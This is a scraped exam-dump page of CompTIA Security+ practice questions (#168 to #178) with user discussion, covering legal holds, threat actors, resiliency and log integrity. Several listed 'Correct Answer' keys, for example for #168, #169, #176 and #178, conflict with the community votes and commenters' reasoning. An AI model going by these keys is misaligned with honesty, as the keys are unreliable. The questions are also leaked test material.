upvoted 1 times

  kennyleung0514 3 months, 3 weeks ago


Selected Answer: C
SSO ---> thus it's federate
upvoted 1 times

  ksave 4 months, 2 weeks ago


Selected Answer: C
Federation
upvoted 2 times

  ahmadawni 4 months, 3 weeks ago


Selected Answer: C
Federation :)
upvoted 2 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
C should be the correct one
upvoted 2 times

  banditring 5 months ago


Imma go with C, Federation because of this definition I found in this book:
Federation or federated identity is a means of linking a subject's accounts from several sites, services, or entities in a single account. It's a means
to accomplish single sign-on, thus making service/site access easier for visitors and reducing the number of unique logon credential sets that a
user has to create, store, manage, and secure.
upvoted 3 times

  okay123 5 months ago


Selected Answer: C
Federation: A process that allows for the conveyance of identity and authentication information across a set of networked systems

Think EduRam https://eduroam.org/


upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 299/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #168 Topic 1

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not
deleted. Which of the following should the company implement to assist in the investigation?

A. Legal hold

B. Chain of custody

C. Data loss prevention

D. Content filter

Correct Answer: B

Community vote distribution


A (91%) 5%

  stoneface Highly Voted  5 months ago


Selected Answer: A
A. Legal hold
upvoted 12 times

  Josh_Feng 5 months ago


I agree, you need legal hold to make sure its not deleted, while chain of custody is to make sure it is not modified.
upvoted 8 times

  ZDW Most Recent  1 week, 4 days ago


Selected Answer: C
Why A or B a company doesn't put a legal hold on itself that is done by the authorities and the chain of custody is also done by the investigators
the only thing here the company could do to itself that makes sense is C DLP
upvoted 1 times

  nicekoda 1 month ago


Answer A: A legal hold, also known as a litigation hold, is the process by which organizations preserve potentially relevant information when
litigation is pending or reasonably anticipated. By issuing a legal hold, organizations notify custodians about their duty not to delete ESI or
physical documents relevant to a case.
upvoted 1 times

  keak 2 months ago


Selected Answer: A
Legal hold: Protecting any documents that can be used in evidence from being altered or destroyed, sometimes called litigation hold.
upvoted 1 times

  JSOG 2 months, 2 weeks ago


Selected Answer: A
A sounds the best
upvoted 1 times

  bengy78 2 months, 3 weeks ago


If the company is under a legal investigation a legal hold is put on them, its not something they put on themselves. The question asks what they
could "implement" that would help. That would be a DLP so data can't get moved/removed/deleted.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


WHy not DLP?
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
Hmm! When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been
tampered with or is different than it was when it was collected. Legal hold refers to the fact that information that maybe relevant to a court case
must be preserved. Wow. Chain of custody sounds close to me
upvoted 1 times

  zharis 3 months, 1 week ago


but looking deeply into the question itself, I feel a legal hold is more preferable because the is no mention of the company needing any form of
protection. My final answer will be A
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 300/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  comeragh 3 months, 2 weeks ago


Selected Answer: A
Agree with A.
not deleted - legal hold
not modified - chain of custody
upvoted 4 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
A, legal hold seems to be the right answer
upvoted 2 times

  KetReeb 5 months ago


Answer is A: once an organization is aware that it needs to preserve evidence for a court case, it must do so. The mechanism is fairly simple as
well: once you realize your organization needs to preserve evidence, you must use a legal hold, or litigation hold, which is the process by which
you properly preserve any and all digital evidence related to a potential case.
upvoted 4 times

  Joe1984 5 months ago


I'm torn between a and b. Doesn't legal hold require information, like emails, to be kept for a certain amount of time?
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 301/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #169 Topic 1

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user
opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?

A. Time-based logins

B. Geofencing

C. Network location

D. Password history

Correct Answer: B

Community vote distribution


A (100%)

  Wildstar Highly Voted  5 months, 1 week ago


This doesn't state that on Monday he came back onto the local corporate network, just that he connected successfully, now. How can it be
Geofencing if he is still off premises.
upvoted 8 times

  deeden 4 months, 1 week ago


Maybe this question was created before the pandemic started, and that working remotely on a Monday is just incomprehensible at that time :)
I agree with option A.
upvoted 2 times

  stoneface 5 months ago


Exact same thought I have, there is no mention of returning to offices.
upvoted 2 times

  KetReeb 5 months ago


time-based logins (A): couldn't login on the weekend. The question is vague, but sounds like he connected to the site via his vpn, but could
not log in on the weekend.
upvoted 5 times

  banditring Highly Voted  5 months ago


This question is flawed; its clearly Time Based Logins. I'm starting to think that the actual CompTIA test has these wrong answers just to trick us
in order for us to fail and they make money just so we can retake this exam.
upvoted 5 times

  Olu_G Most Recent  1 month, 1 week ago


The user knows that his schedule was not time based that was why he attempted to login. If the question says a new user that might be a
different thing.
upvoted 1 times

  FMMIR 2 months, 3 weeks ago


Time-based authentication is a special procedure to prove an individual's identity and authenticity on appearance simply by detecting its
presence at a scheduled time of day or within a scheduled time interval and on a distinct location. To enable time-based authentication, a special
combination of objects is required.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: A
Time based logins should be the answer because Geofencing is accepting or rejecting access requests based on location.
upvoted 1 times

  p610878 3 months, 3 weeks ago


Time-based logins: Time-of-day restrictions is an access control concept that limits when a user account is able
to log into a system or network. This is a tool and technique for limiting access to sensitive
environments to normal business hours, when oversight and monitoring can be performed
to prevent fraud, abuse, or intrusion. Time-of-day restrictions may also force logout on an
account after the authorized time period ends.
upvoted 3 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
Time based login
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 302/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  k9_462 4 months, 3 weeks ago


Selected Answer: A
this has to be a time based login issue
upvoted 2 times

  whateverIguess 4 months, 3 weeks ago


Ok I think I figured this one out. I kept saying its Time-based logins based on the information given in the question, BUT the correct term is TOTP
(Time-based One-Time Passwords). If the option was TOTP instead of Time-based logins, then it would be the answer. But CompTIA seriously
makes this test trickier than it has to be
upvoted 1 times

  varun0 5 months ago


Selected Answer: A
On Monday he logged in via VPN just like he did on the weekends and it worked.
upvoted 2 times

  Josh_Feng 5 months ago


Selected Answer: A
Question is a bit misleading, but we are assuming that he never went back to office. Since it is assume to be a time issue, it has to be A.
upvoted 1 times

  Joe1984 5 months ago


Time-based makes more since here. Network access was turned off during the weekend.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 303/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #170 Topic 1

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign
strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

A. Semi-authorized hackers

B. State actors

C. Script kiddies

D. Advanced persistent threats

Correct Answer: B

Community vote distribution


B (80%) D (20%)

  JoeThun Highly Voted  11 months, 3 weeks ago


E: Hacktivists , FUCK YOU COMPTIA.
upvoted 93 times

  varun0 Highly Voted  5 months ago


Selected Answer: B
Fuck comptia
upvoted 5 times

  ImpactTek Most Recent  2 months, 3 weeks ago


The answer should be "Hacktivist" which is not among the answers. State actors can make advanced persistent threats (APT), but they should
be able to do hacktivism, so I go with state actors.
upvoted 3 times

  zharis 3 months, 1 week ago


Selected Answer: B
On the spot.. State actors goals are primarily espionage and strategic advantage but it is not unknown for countries
upvoted 2 times

  ostralo 3 months, 3 weeks ago


“Nation-state threat actors are persistent and mission-oriented, which makes it that much more difficult for private organizations to defend
effectively,”

Unlike criminal actors, nation-state threat actors are not motivated by financial gain and have a great deal of sophisticated resources and
patience. As was seen during the SolarWinds attack, blamed on Russia, nation-state actors can lurk inside a compromised network for months
without detection.

Anyway, go for Hactivists if there is one.


upvoted 1 times

  ostralo 3 months, 3 weeks ago


https://www.cybersecuritydive.com/news/nation-state-threat-actors/621100/
upvoted 1 times

  adodoccletus 4 months, 1 week ago


This is not a state actor because he is not sponsored by the state...... State actor seems to be the best answer in the options anyways
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


This is literally a hacktivist but whatever comptia
upvoted 3 times

  Joe1984 5 months ago


They have re-worded the question and changed available answers, State actors is correct.
upvoted 4 times

  MrBrave 6 months ago


B
It should be hacktivists but that's not on the list of options so I'm leaning to state actors as it mentioned "political party"
upvoted 1 times

  RougePotatoe 6 months, 2 weeks ago


Selected Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 304/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Comptia's handbook:
APT=An attacker's ability to obtain, maintain, and diversify access to network systems using exploits and malware.

Stateactor=A type of threat actor that is supported by the resources of its host country's military and security services.
upvoted 2 times
  Ribeiro19 7 months, 3 weeks ago
Selected Answer: B
it's B fulks. nothing on the question indicates APT.
upvoted 2 times

  SpicyTangerine 7 months, 3 weeks ago


Selected Answer: B
Ans B: state actors. According to Darril Gibson’s security + book “While APTs can be any group of highly organized attackers, they are typically
sponsored by nation-states or governments. In this context, APT members are state actors. These state actors typically have specific targets,
such as a certain company, organization, or government agency. Successful attacks often allow unauthorized access for long periods of time,
giving the APTs the ability to exfiltrate a significant amount of data”
upvoted 1 times

  Branchflake 10 months, 1 week ago


It would have to have Nation state actor (which is another name for APT)for that to be the answer. State actors are just APT, therefore D-APT is
the answer
upvoted 2 times

  hmAZtime 10 months, 2 weeks ago


what a question! I've never seen State Actor in SY601. But from the website provided with the answer, looks like it's kinda similar to Hacktivists.
Okay, I remember the answer. Hope it won't be in the exam!
upvoted 1 times

  CapnFlint 10 months, 3 weeks ago


The best answer is hacktivist but that's not an option. I dont think its APT because it doesnt say anything about an advanced attack or the
attackers hanging in the system undetected for a period of time. State actor is too specific, there's nothing to suggest this is a state actor. That
leaves script kiddie. Not a good answer but the one that makes the most sense.
upvoted 1 times

  wolf_123 10 months, 3 weeks ago


Selected Answer: D
Politically motivated? -> hacktivist
Hacking a specific political party and giving the opposite party an advantage, while may causing trouble in the country? -> more like APT (which
is technically state actor?)
upvoted 3 times

  [Removed] 6 months, 1 week ago


Prof Messer's notes have APTs as commonly used by nation state actors. Assuming his notes accurately represent the CompTIA objectives,
state actors are the actors and APTs are sometimes used. Based on this question we don't know if they used an APT. The attacker could've
just hacked in once, grabbed the data, and gotten out. I'd probably guess state actor.
upvoted 1 times

  shemilandia 10 months, 3 weeks ago


From CompTIA official Book: State Actors
At the top end of the spectrum shown in Figure 5-1 are those highly technical individuals, often referred to as elite hackers, who not only have the
ability to write scripts that exploit vulnerabilities but also are capable of discovering new vulnerabilities. This group is the smallest of the lot,
however, and is responsible for, at most, only 1 to 2 percent of intrusive activity. Many of these elite hackers are employed by major cybersecurity
firms in an effort to combat criminal activity. Others are employed by nation-states and other international organizations, to train and run large
groups of skilled hackers to conduct nation-state attacks against a wide range of adversaries. In the United States, government rules and
regulations prevent government workers from attacking companies for reasons of economic warfare. Not all countries live by this principle, and
many have organized hacking efforts designed to gather information from international companies, stealing intellectual property for the express
purpose of advancing their own country’s national companies.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 305/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #171 Topic 1

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

A. Default system configuration

B. Unsecure protocols

C. Lack of vendor support

D. Weak encryption

Correct Answer: B

Community vote distribution


C (92%) 8%

  hac_cah Highly Voted  1 year ago


Selected Answer: C
Lack of vendor support implies no security patches. Unsecure protocols are not necessarily always the case.
upvoted 23 times

  ishallgetit 9 months, 2 weeks ago


"security patches" convince me that C is correct answer
upvoted 2 times

  elberG Highly Voted  11 months ago


The risk is Unsecure protocols, that it's cause by lack of vendor support.
upvoted 11 times

  andrizo 3 months, 3 weeks ago


not necessarily unsecure, just outdated security
upvoted 1 times

  viksap Most Recent  1 month, 2 weeks ago


Selected Answer: C
Agree with C since no patches will be available will increase security risk
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
Going with the most correct answer here would be C as I searche dthe definition of Legacy online and saw that it literall means "out of date"
systems and I am reminded of the recent updates such as how phone companies say they wont support old phones made only 5 years ago (im
shocked to think that so many resources go into making a device so short lived - what happened to long life products lol)
upvoted 1 times

  darkgypsy 3 months ago


Selected Answer: C
Legacy Systems - Legacy systems are a source of risk because they no longer receive security updates
and because the expertise to maintain and troubleshoot them is a scarce resource
upvoted 1 times

  Orean 3 months, 1 week ago


Selected Answer: C
It's perfectly plausible for legacy systems to have protocol issues, but the scenario doesn't state that. All we can definitively infer is that the
legacy system—by definition—is not being actively supported or maintained by the vendor, which can cause various issues.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
legacy items have protocol issues.
upvoted 1 times

  PiotrG 4 months, 1 week ago


Selected Answer: C
because i am king piotr
upvoted 1 times

  db97 4 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 306/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

I think "lack of Vendor Support" is the reason but not the risk and also I wouldn't discard "Weak Encryption" as a potential risk due to if it is a
web server for example, they could still use a "secure protocol" by setting up HTTPS but the encryption might be under SSL 1.0/2.0/3.0 and not
even TLS and that would be real risk. These are just my thoughts, I'm open to discuss it.
upvoted 1 times

  Boats 4 months, 3 weeks ago


Selected Answer: C
Having used legacy software, I would go with C. We don't have enough information to go with anything else. We only know that it is potentially
unsupported.
upvoted 2 times

  Joe1984 5 months ago


I believe it is Unsecure protocols. It basically saying, its old, there is no vendor support, what is the result = unsecure protocols
upvoted 2 times

  [Removed] 5 months, 1 week ago


Selected Answer: C
Fact this is a legacy system it doesn't mean it uses default credentails, weak encryption or unsecure protocols.
Hence only answer may be "Lack of vendor support"
upvoted 3 times

  Bman3001 5 months, 1 week ago


I checked multiple sites and even though I think the answer is C. I will have to go with unsecure protocols per this site and the others I saw
upvoted 2 times

  EdT1 6 months, 1 week ago


Selected Answer: B
Agreed with B. Unsecured protocols, ports, backdoor not being fixed by new patches.
upvoted 2 times

  cartoonz 5 months, 2 weeks ago


This could be the result of Lack of Vendor Support, but its not the main risk, other issues could arise as well that wouldnt be supported.
upvoted 2 times

  CapnFlint 10 months, 3 weeks ago


Its lack of vendor support. A legacy program does not necessarily use unsecure protocols, what makes it legacy is lack of vendor support (no
patches [provided by vendor is the main concern here)
upvoted 6 times

  LordScorpius 11 months, 4 weeks ago


If it had unsecure protocols it would be because of a lack of vendor support.
upvoted 1 times

  BLADESWIFTKNIFE 1 year ago


Selected Answer: C
I thought it would be C too. Because of the Legacy program
upvoted 1 times

  Papaapa77 11 months, 2 weeks ago


Legacy program are due to lack of vendor support
I will go with C
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 307/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #172 Topic 1

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment.
Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST
describes the type of assessment taking place?

A. Input validation

B. Dynamic code analysis

C. Fuzzing

D. Manual code review

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Dynamic analysis means that the application is tested under "real world" conditions using a staging environment.
upvoted 10 times

  andrizo Most Recent  3 months, 3 weeks ago


whats the difference between code analysis and manual code review?
upvoted 1 times

  NavySteel 2 months, 3 weeks ago


Manual code review is when the developer checks every line of code.
upvoted 1 times

  ostralo 3 months, 3 weeks ago


static code analysis is a form of white-box testing that can help identify security issues in source code. On the other hand, dynamic code analysis
is a form of black-box vulnerability scanning that allows software teams to scan running applications and identify vulnerabilities.

When properly implemented, dynamic code analysis can reduce mean time to identification (MTTI) for production incidents, improve visibility to
application issues, and increase a project’s overall security posture.

https://www.checkpoint.com/cyber-hub/cloud-security/what-is-dynamic-code-analysis/
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: B
Agree with B
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 308/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #173 Topic 1

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

A. Smart card

B. Push notifications

C. Attestation service

D. HMAC-based

E. one-time password

Correct Answer: B

Community vote distribution


B (91%) 9%

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: B
It's like the google notification, is a MFA -give you push notifications to authenticate and alert you on someone is trying to log in your acount.
upvoted 9 times

  deeden 4 months, 1 week ago


OTP can be used the same scenario, although no approve/deny button?
upvoted 1 times

  serginljr 4 months, 3 weeks ago


Correct
upvoted 2 times

  ronniehaang Most Recent  4 days, 4 hours ago


Selected Answer: B
Push notifications (B) can work as an authentication method and an alerting mechanism for unauthorized access attempts. Push notifications
allow for two-factor authentication (2FA), where a user receives a message on their mobile device that must be confirmed in order to log in to an
application or website. If an unauthorized access attempt is made, the system can alert the user via a push notification, allowing the user to take
action and confirm whether the access attempt was legitimate or not. This serves as an additional layer of security beyond a username and
password, and provides a way for the user to be aware of and prevent potential unauthorized access.
upvoted 1 times

  nicekoda 1 month ago


Push Notification Authentication enables user authentication by sending a push notification directly to a secure application on the user's device,
alerting them that an authentication attempt is taking place. The answer is B
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
A smart card can work as both an authentication method and an alerting mechanism for unauthorized access attempts. A smart card is a
physical card, typically the size of a credit card, that contains a microprocessor and memory. The card can be inserted into a card reader, where it
can be used to authenticate the user's identity by requiring a personal identification number (PIN) or password.

Additionally, a smart card can also be configured to send a push notification to the user's mobile device whenever an unauthorized access
attempt is detected. This can alert the user to the attempt and allow them to take appropriate action to prevent unauthorized access.
upvoted 1 times

  Sandon 1 week, 3 days ago


That ain't it
upvoted 2 times

  andrizo 3 months, 3 weeks ago


What Is an Attestation Service? An attest service, or attestation service, is an independent review of a company's financial statement conducted
by a certified public accountant (CPA). The CPA delivers an attestation report with conclusions about the reliability of the data.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 309/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #174 Topic 1

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers
without migrating servers to a new network. Which of the following solutions should the company implement?

A. Intranet

B. Screened subnet

C. VLAN segmentation

D. Zero Trust

Correct Answer: C

Community vote distribution


C (100%)

  banditring Highly Voted  5 months ago


Just for someone (like me) that didnt know what a flat network is a flat network is a computer network design approach that aims to reduce cost,
maintenance and administration. Flat networks are designed to reduce the number of routers and switches on a computer network by connecting
the devices to a single switch instead of separate switches.
upvoted 33 times

  RonWonkers 4 months, 1 week ago


Thanks
upvoted 1 times

  db97 4 months, 1 week ago


Thank you for sharing, that was useful.
upvoted 2 times

  aktion Most Recent  1 month, 3 weeks ago


Using a vlan will require that you provide a new subnet for the servers that you will be moving into the new vlan. The right option in my opinion is
zero trust. As that allows for grouping servers and applying specific policies to them even though they are in the same subnet.
upvoted 1 times

  cymm 4 weeks ago


I agree with you. Anyone who knows network would know you can't VLAN segment without IP segmenting as well. Only way here would be
some sort of ZTNA implemenation, no doubt in this case network security rules in the cloud.
upvoted 1 times

  Blueteam 2 months, 1 week ago


Flat network is the network that doesn't utilize VLAN.
All communications happening in one layer. Using VLAN with give layers to the network.
Now communications will happening on different virtual channels or layers.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
I agree with this.
upvoted 1 times

  Knowledge33 3 months ago


Thank you for this definition.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 310/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #175 Topic 1

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk
of malicious activity occurring after a tour?

A. Password complexity

B. Acceptable use

C. Access control

D. Clean desk

Correct Answer: D

Community vote distribution


D (65%) C (35%)

  Boats Highly Voted  4 months, 3 weeks ago


Selected Answer: D
A malicious investor would not be able to take advantage of anything gained until after the tour if the swiped a USB, looked at or stole
documents. If their was a clean desk policy then that would prevent issues after a tour.
upvoted 11 times

  ronniehaang Most Recent  4 days, 4 hours ago


Selected Answer: C
The best policy to reduce the risk of malicious activity after a SOC tour is "Access control". Access control defines the specific individuals who
are authorized to enter a secure area and what actions they are permitted to perform while inside. It also defines when and how those
permissions can be changed or revoked. By implementing access control policies, the president of the regional bank can ensure that only
authorized personnel are able to access the SOC and sensitive information during and after the tours, reducing the risk of malicious activity.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: C
C. Access control is the best answer to reduce the risk of malicious activity occurring after a tour. Implementing access control measures such as
limiting access to certain areas or systems to authorized personnel only can help to prevent unauthorized individuals from gaining access to
sensitive information or systems. This is especially important if the president is giving tours to potential investors, as they may not have the same
level of clearance as employees of the bank. Ensuring that access controls are in place and strictly enforced can help to reduce the risk of
malicious activity or unauthorized access.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The best policy to reduce the risk of malicious activity occurring after a tour is access control. Access control refers to the measures put in place
to limit access to a building, system, or network to only authorized individuals. This can include measures such as requiring a password, using
security badges or installing security cameras. By limiting access to only authorized individuals, the risk of malicious activity occurring is
significantly reduced.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: D
At first I was thinking C but now im going with D as its a policy which takes time and red tape through admin to authorise etc and anyways what
bank dosent already have ACL's... Working in an office I find that a Clean desk policy is best suited to prevent undercover reporters, competitors
or malicious actors snooping company secrets left on the desk if its been a hectic day in the office. We have all seen the movie f that one person
sneaking away with a usb stick after a tour of a office holding top secret information, or is it just me ? ;-)
upvoted 2 times

  Sutokuto 3 months, 1 week ago


Selected Answer: D
>After the tour
upvoted 3 times

  03allen 3 months, 2 weeks ago


Selected Answer: C
going with C after tour
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 311/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

i think people are focusing on after the tour too much. clean desk is for removing sensitive documents in plain sight. no ones going to use this
during the tour. access control could literally be anything like door locks.
upvoted 4 times
  Skelter117 3 months, 3 weeks ago
They way I take it is.. if credentials or proprietary information is seen on a desk after the tour is over, the person that saw the information can use
it maliciously.

I’m going with clean desk


upvoted 3 times

  dansecu 3 months, 4 weeks ago


Selected Answer: D
Access control should be implemented any time, not only drinng or after tours.
Clean desk and hiding non public sensitive data from monitors is highly recommended during tours of external users.
upvoted 3 times

  comeragh 4 months ago


Selected Answer: C
C - Access Control for me. Key words "after the tour"
upvoted 3 times

  ramesh2022 4 months ago


I got with D. Investor can take any ID or contact or credential notes etc if anyone leaves on the table and try after the tour.
upvoted 2 times

  zevoroth 4 months, 1 week ago


Selected Answer: C
I was torn between C and D, but I'm going with C. at the conclusion of the tour, access control ensures nobody is hanging around the SOC to
commit malicious acts.
upvoted 1 times

  deeden 4 months, 1 week ago


Selected Answer: C
In my opinion, Access control can deter and/or prevent potential intrusion attempts (physical or network) after a recon scenario such as this.
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
Agree with D, the question states "reduces the risk of malicious activity occurring after a tour?" During the tour someone grabbed a USB stick or
ID card, making malicious activity possible after the tour.
upvoted 2 times

  Ay_ma 4 months, 3 weeks ago


The question says "after the tours" not during. I would go with D if it was during the tours.
But then it doesn't make sense that a malicious investor would risk coming back if he is a known investor.
But then they have a good idea of the building's layout, so they could easily carry out a physical operation with that knowledge. Like in those
movies where someone goes into the building to scout the level of security before the big operation.
upvoted 3 times

  deeden 4 months, 1 week ago


Good point, after, not during. Maybe option C. Access Control? One possible scenario could also be shoulder surfing. SOC could potentially
display a number of sensitive info during operation which can be used later for intrusion attempts, physical or technical.
upvoted 2 times

  Ay_ma 4 months, 3 weeks ago


Or even in the case of tailgating. Someone posing as an investor.
upvoted 2 times

  kingsAffection 4 months, 4 weeks ago


Selected Answer: D
keyphrase - "after a tour", post-its containing credentials may be stolen and used for unauthorized access later on, therefore, I go with Clean
Desk Policy.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 312/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #176 Topic 1

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:
* Critical fileshares will remain accessible during and after a natural disaster.
* Five percent of hard disks can fail at any given time without impacting the data.
* Systems will be forced to shut down gracefully when battery levels are below 20%.
Which of the following are required to BEST meet these objectives? (Choose three.)

A. Fiber switching

B. IaC

C. NAS

D. RAID

E. UPS

F. Redundant power supplies

G. Geographic dispersal

H. Snapshots

I. Load balancing

Correct Answer: BCD

Community vote distribution


DEG (100%)

  Vishnuks Highly Voted  5 months ago


Answer D,E,G correct me If I'm wrong
upvoted 31 times

  [Removed] 5 months ago


I agree with you and stone
upvoted 2 times

  deeden 4 months, 1 week ago


Agree with DEG, make sense.
upvoted 3 times

  k9_462 5 months ago


same.
RAID covers the 5% disk failure
UPS covers the graceful shutdown
Geo Disp covers the critical file shares remain available during disaster
upvoted 9 times

  stoneface 5 months ago


same thought here.
upvoted 7 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: DEG
To BEST meet the objectives described in the question, the following solutions are required:

D. RAID: Using RAID (Redundant Array of Independent Disks) technology allows for data to be distributed across multiple disks, providing
protection against disk failures.

E. UPS: Using an uninterruptible power supply (UPS) will ensure that systems can shut down gracefully when battery levels are low, protecting
against data loss due to sudden power outages.

G. Geographic dispersal: Spreading critical data across multiple data centers in different geographic locations will ensure that it remains
accessible even if one data center is affected by a natural disaster.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: DEG
Yes :) 100percent

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 313/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  Iphy23 3 months, 2 weeks ago
what is NAS?
upvoted 1 times

  Vegaswhodat1 3 months, 2 weeks ago


Network Attached Storage
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Selected Answer: DEG
I’m going with that.
upvoted 2 times

  comeragh 4 months ago


Selected Answer: DEG
D,E,G - agreed
upvoted 2 times

  ramesh2022 4 months ago


DEG is the best answer
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: DEG
Agree with D,E,G
upvoted 2 times

  msyusa 4 months, 2 weeks ago


d,e,g highly correct
upvoted 2 times

  FQ 4 months, 3 weeks ago


Selected Answer: DEG
Same explanation as K9_462
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 314/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #177 Topic 1

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

A. Set up hashing on the source log file servers that complies with local regulatory requirements.

B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.

C. Write protect the aggregated log files and move them to an isolated server with limited access.

D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

Correct Answer: A

Community vote distribution


A (79%) C (21%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Set up hashing will provide integrity
upvoted 5 times

  ronniehaang Most Recent  4 days, 4 hours ago


Selected Answer: A
A. Set up hashing on the source log file servers that complies with local regulatory requirements.

Hashing is a security best practice to ensure the integrity of log files within a SIEM. By setting up a hash on the source log file servers, the SIEM
can detect if the log files have been tampered with or altered in any way. This helps to ensure the integrity and accuracy of the log files and
provides an added layer of security. It is also important to comply with local regulatory requirements regarding hashing and log file retention.
upvoted 1 times

  lordguck 3 months, 1 week ago


Regarding A as solution: I can't see, what hashing the original source logs helps, if you are asked to ensure the integrity of the aggregated! log
files. So it is C, I think. Please correct me, if I am wrong
upvoted 2 times

  comeragh 4 months ago


Selected Answer: A
Agree with A here. As per Jason Dions tips for the exam - match integrity/hashing
upvoted 3 times

  deeden 4 months, 1 week ago


Selected Answer: A
I agree with A. This question is concern about integrity, no mention about availability.
upvoted 2 times

  hazeleyes 4 months, 3 weeks ago


Selected Answer: A
Log File Integrity Validation in AWS

This feature informs you on any modifications or deletions to CloudTrail logs. By using SHA-256 for hashing and SHA-256 with RSA for digital
signing, AWS claims, “This makes it computationally infeasible to modify, delete, or forge CloudTrail log files without detection.”
upvoted 4 times

  j0n45 4 months, 4 weeks ago


Selected Answer: C
I'd say C, write protecting the aggregated log files and moving them to an isolated server with limited access would protect them from tampering,
modification, and deletion
upvoted 4 times

  zzzfox 4 months, 3 weeks ago


An isolated server would limit the risk, but still, you are not able to validate the integrity
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 315/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #178 Topic 1

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of
the following is an immediate consequence of these integrations?

A. Non-compliance with data sovereignty rules

B. Loss of the vendors interoperability support

C. Mandatory deployment of a SIEM solution

D. Increase in the attack surface

Correct Answer: A

Community vote distribution


D (78%) A (15%) 7%

  stoneface Highly Voted  5 months ago


Selected Answer: D
Choosing D:
